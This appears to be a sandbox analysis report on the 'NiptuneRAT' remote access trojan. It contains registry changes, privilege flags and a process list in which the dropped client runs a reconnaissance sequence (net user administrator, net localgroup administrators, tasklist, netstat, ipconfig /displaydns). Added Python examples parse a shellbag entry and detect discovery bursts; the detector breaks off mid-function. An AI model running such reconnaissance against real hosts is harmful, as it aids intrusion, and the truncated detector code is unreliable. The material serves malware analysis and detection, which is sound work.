| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\NodeSlot = "9" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "8" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\MRUListEx = ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202 | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\Shell\SniffedFolderType = "Generic" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0 = 6800310000000000715814ae10004e495054554e7e310000500009000400efbe715801ae715814ae2e000000dca70200000006000000000000000000000000000000796af6004e0069007000740075006e0065005200410054002d006d00610069006e00000018000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\MRUListEx = ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\MRUListEx = 020000000100000000000000ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\MRUListEx = ffffffff | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\1\0\NodeSlot = "4" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "4" | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg | C:\Windows\system32\OpenWith.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
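The BagMRU\1\0\0\0\1\0 value set by NiptuneRAT.exe above is an ITEMIDLIST, the shellbag record Explorer writes when a folder is shown in a common file dialog (the ComDlg subkeys next to it). The parser below is an added example, not part of the report or of the RAT's code, and decodes the exact bytes from that row into the 8.3 and long folder names, the FAT timestamps (sandbox local time, 2-second resolution) and the NTFS file reference of the folder. The layout follows the documented Windows shell item format (file-entry item type 0x3x with a 0xBEEF0004 extension block); the dictionary field names are this example's own.

```python
import struct
from datetime import datetime

# Bytes of the BagMRU\1\0\0\0\1\0 value from the registry table above, split by field.
# An ITEMIDLIST is a sequence of size-prefixed shell items ended by a 2-byte zero.
BAGMRU_VALUE_HEX = (
    "6800310000000000715814ae1000"      # item: size 0x68, type 0x31, file size, FAT mtime, attrs 0x10
    "4e495054554e7e310000"              # "NIPTUN~1\0" + alignment pad
    "500009000400efbe"                  # extension block: size 0x50, version 9, signature 0xBEEF0004
    "715801ae715814ae"                  # FAT creation and access date/time
    "2e000000"                          # writer version id + unknown
    "dca7020000000600"                  # NTFS file reference (48-bit MFT entry, 16-bit sequence)
    "0000000000000000"                  # unknown
    "0000"                              # localized name size
    "00000000796af600"                  # unknown (version 9) + unknown (version 8)
    "4e0069007000740075006e0065005200410054002d006d00610069006e000000"  # "NiptuneRAT-main" UTF-16LE + NUL
    "1800"                              # offset of the first extension block
    "0000"                              # ITEMIDLIST terminator
)


def fat_datetime(date: int, time: int) -> datetime:
    """Decode a DOS/FAT date (YYYYYYYMMMMDDDDD) and time (HHHHHMMMMMMSSSSS)."""
    return datetime(1980 + (date >> 9), (date >> 5) & 0xF, date & 0x1F,
                    time >> 11, (time >> 5) & 0x3F, (time & 0x1F) * 2)


def _read_utf16z(buf: bytes, pos: int):
    """Read a NUL-terminated UTF-16LE string, stepping two bytes at a time."""
    end = pos
    while buf[end:end + 2] != b"\x00\x00":
        end += 2
    return buf[pos:end].decode("utf-16-le"), end + 2


def parse_file_entry_item(item: bytes) -> dict:
    """Parse one file-entry shell item (type 0x30-0x3F) and its 0xBEEF0004 block."""
    size, kind = struct.unpack_from("<HB", item, 0)
    if kind & 0x70 != 0x30:
        raise ValueError(f"not a file-entry item: type 0x{kind:02x}")
    file_size, mdate, mtime, attrs = struct.unpack_from("<IHHH", item, 4)
    short_name = item[14:item.index(b"\x00", 14)].decode("ascii")

    # The last 2 bytes of the item point at the first extension block.
    ext_off = struct.unpack_from("<H", item, size - 2)[0]
    ext_size, version, sig = struct.unpack_from("<HHI", item, ext_off)
    if sig != 0xBEEF0004:
        raise ValueError(f"unexpected extension block signature 0x{sig:08x}")
    cdate, ctime, adate, atime, writer_id = struct.unpack_from("<HHHHH", item, ext_off + 8)

    pos = ext_off + 18
    mft_entry = mft_sequence = None
    if version >= 7:
        pos += 2                                     # unknown
        ref = struct.unpack_from("<Q", item, pos)[0]
        mft_entry, mft_sequence = ref & 0xFFFFFFFFFFFF, ref >> 48
        pos += 16                                    # file reference + 8 unknown bytes
    if version >= 3:
        pos += 2                                     # localized name size
    if version >= 9:
        pos += 4                                     # unknown
    if version >= 8:
        pos += 4                                     # unknown
    long_name, _ = _read_utf16z(item, pos)

    return {
        "short_name": short_name, "long_name": long_name,
        "is_directory": bool(attrs & 0x10), "file_size": file_size,
        "modified": fat_datetime(mdate, mtime),
        "created": fat_datetime(cdate, ctime),
        "accessed": fat_datetime(adate, atime),
        "writer_id": writer_id, "mft_entry": mft_entry, "mft_sequence": mft_sequence,
    }


def parse_idlist(raw: bytes) -> list:
    """Walk the size-prefixed items of an ITEMIDLIST until the zero terminator."""
    items, pos = [], 0
    while True:
        size = struct.unpack_from("<H", raw, pos)[0]
        if size == 0:
            return items
        items.append(parse_file_entry_item(raw[pos:pos + size]))
        pos += size


if __name__ == "__main__":
    for entry in parse_idlist(bytes.fromhex(BAGMRU_VALUE_HEX)):
        print(entry)
```

Only file-entry items are handled; root, volume and network shell items use other layouts and would raise here. The folder name confirms the dialog was browsing the extracted NiptuneRAT-main directory, and the MFT reference lets the entry be tied to the $MFT record if the disk image is available.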
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: 35 | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Desktop\$77NiptuneClient.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\NETSTAT.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
| Image | Command line |
| C:\Windows\Explorer.exe | C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip |
| C:\Windows\System32\rundll32.exe | C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding |
| C:\Program Files\7-Zip\7zFM.exe | "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip" |
| C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe | "C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe" |
| C:\Windows\system32\wbem\WmiApSrv.exe | C:\Windows\system32\wbem\WmiApSrv.exe |
| C:\Users\Admin\Desktop\$77NiptuneClient.exe | "C:\Users\Admin\Desktop\$77NiptuneClient.exe" |
| C:\Windows\SYSTEM32\cmd.exe | "cmd.exe" |
| C:\Windows\system32\systeminfo.exe | systeminfo |
| C:\Windows\system32\HOSTNAME.EXE | hostname |
| C:\Windows\system32\net.exe | net user |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user |
| C:\Windows\system32\net.exe | net localgroup |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 localgroup |
| C:\Windows\system32\net.exe | net localgroup administrators |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 localgroup administrators |
| C:\Windows\system32\net.exe | net user guest |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user guest |
| C:\Windows\system32\net.exe | net user administrator |
| C:\Windows\system32\net1.exe | C:\Windows\system32\net1 user administrator |
| C:\Windows\system32\tasklist.exe | tasklist /svc |
| C:\Windows\system32\ipconfig.exe | ipconfig /all |
| C:\Windows\system32\ROUTE.EXE | route print |
| C:\Windows\system32\ARP.EXE | arp -a |
| C:\Windows\system32\NETSTAT.EXE | netstat -an |
| C:\Windows\system32\ipconfig.exe | ipconfig /displaydns |
| C:\Windows\system32\sc.exe | sc query type= service state= all |
| C:\Windows\system32\OpenWith.exe | C:\Windows\system32\OpenWith.exe -Embedding |
| C:\Windows\system32\NOTEPAD.EXE | "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\pp.anarh.txt |
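The run of commands after the bare "cmd.exe" launch, from systeminfo through sc query, is a stock host, account and network discovery sequence that a single parent would not normally fire off within seconds. The Python below is an added detection example (not from the report or the sandbox) that parses constructed process-creation records in the style of Sysmon Event ID 1 and alerts when one parent spawns five or more distinct discovery tools within a 60-second window. The command lines in the sample are the ones listed above; the PIDs, timestamps and parent/child links are assumed, since the report lists processes but does not show the tree.

```python
from collections import defaultdict
from datetime import datetime

# Built-in discovery tools that appear in this report's process list (lower-case basenames).
DISCOVERY_IMAGES = {
    "systeminfo.exe", "hostname.exe", "net.exe", "net1.exe", "tasklist.exe",
    "ipconfig.exe", "route.exe", "arp.exe", "netstat.exe", "sc.exe",
}

# Constructed process-creation log: timestamp|pid|ppid|image|command line.
# Command lines come from the report; PIDs, times and parentage are assumed.
# The last line is a lone ipconfig from an unrelated parent and must not alert.
SAMPLE_LOG = r"""
2024-03-17T21:49:00|3000|2900|C:\Users\Admin\Desktop\$77NiptuneClient.exe|"C:\Users\Admin\Desktop\$77NiptuneClient.exe"
2024-03-17T21:49:01|4212|3000|C:\Windows\SYSTEM32\cmd.exe|"cmd.exe"
2024-03-17T21:49:02|4300|4212|C:\Windows\system32\systeminfo.exe|systeminfo
2024-03-17T21:49:03|4310|4212|C:\Windows\system32\HOSTNAME.EXE|hostname
2024-03-17T21:49:04|4320|4212|C:\Windows\system32\net.exe|net user
2024-03-17T21:49:04|4330|4320|C:\Windows\system32\net1.exe|C:\Windows\system32\net1 user
2024-03-17T21:49:05|4340|4212|C:\Windows\system32\net.exe|net localgroup
2024-03-17T21:49:06|4350|4212|C:\Windows\system32\net.exe|net localgroup administrators
2024-03-17T21:49:07|4360|4212|C:\Windows\system32\net.exe|net user guest
2024-03-17T21:49:08|4370|4212|C:\Windows\system32\net.exe|net user administrator
2024-03-17T21:49:09|4380|4212|C:\Windows\system32\tasklist.exe|tasklist /svc
2024-03-17T21:49:10|4390|4212|C:\Windows\system32\ipconfig.exe|ipconfig /all
2024-03-17T21:49:11|4400|4212|C:\Windows\system32\ROUTE.EXE|route print
2024-03-17T21:49:12|4410|4212|C:\Windows\system32\ARP.EXE|arp -a
2024-03-17T21:49:13|4420|4212|C:\Windows\system32\NETSTAT.EXE|netstat -an
2024-03-17T21:49:14|4430|4212|C:\Windows\system32\ipconfig.exe|ipconfig /displaydns
2024-03-17T21:49:15|4440|4212|C:\Windows\system32\sc.exe|sc query type= service state= all
2024-03-17T21:55:00|5100|5001|C:\Windows\system32\ipconfig.exe|ipconfig /all
"""


def basename(image: str) -> str:
    """Lower-case file name of an image path, so HOSTNAME.EXE and hostname.exe match."""
    return image.rsplit("\\", 1)[-1].lower()


def parse_event(line: str) -> dict:
    """Split one pipe-delimited record into its fields."""
    ts, pid, ppid, image, cmdline = line.split("|", 4)
    return {"ts": datetime.fromisoformat(ts), "pid": int(pid), "ppid": int(ppid),
            "image": image, "cmdline": cmdline}


def find_discovery_bursts(lines, threshold: int = 5, window_seconds: int = 60) -> list:
    """Alert once per parent that spawns >= threshold distinct discovery tools in a window.

    net1.exe is attributed to its real parent net.exe, not to cmd.exe, so the
    alert counts only what the shell itself launched.
    """
    events = [parse_event(line) for line in lines if line.strip()]
    by_pid = {e["pid"]: e for e in events}
    spawned = defaultdict(list)
    for e in events:
        if basename(e["image"]) in DISCOVERY_IMAGES:
            spawned[e["ppid"]].append(e)

    alerts = []
    for ppid, evs in spawned.items():
        evs.sort(key=lambda e: e["ts"])
        for i, first in enumerate(evs):
            burst = [e for e in evs[i:]
                     if (e["ts"] - first["ts"]).total_seconds() <= window_seconds]
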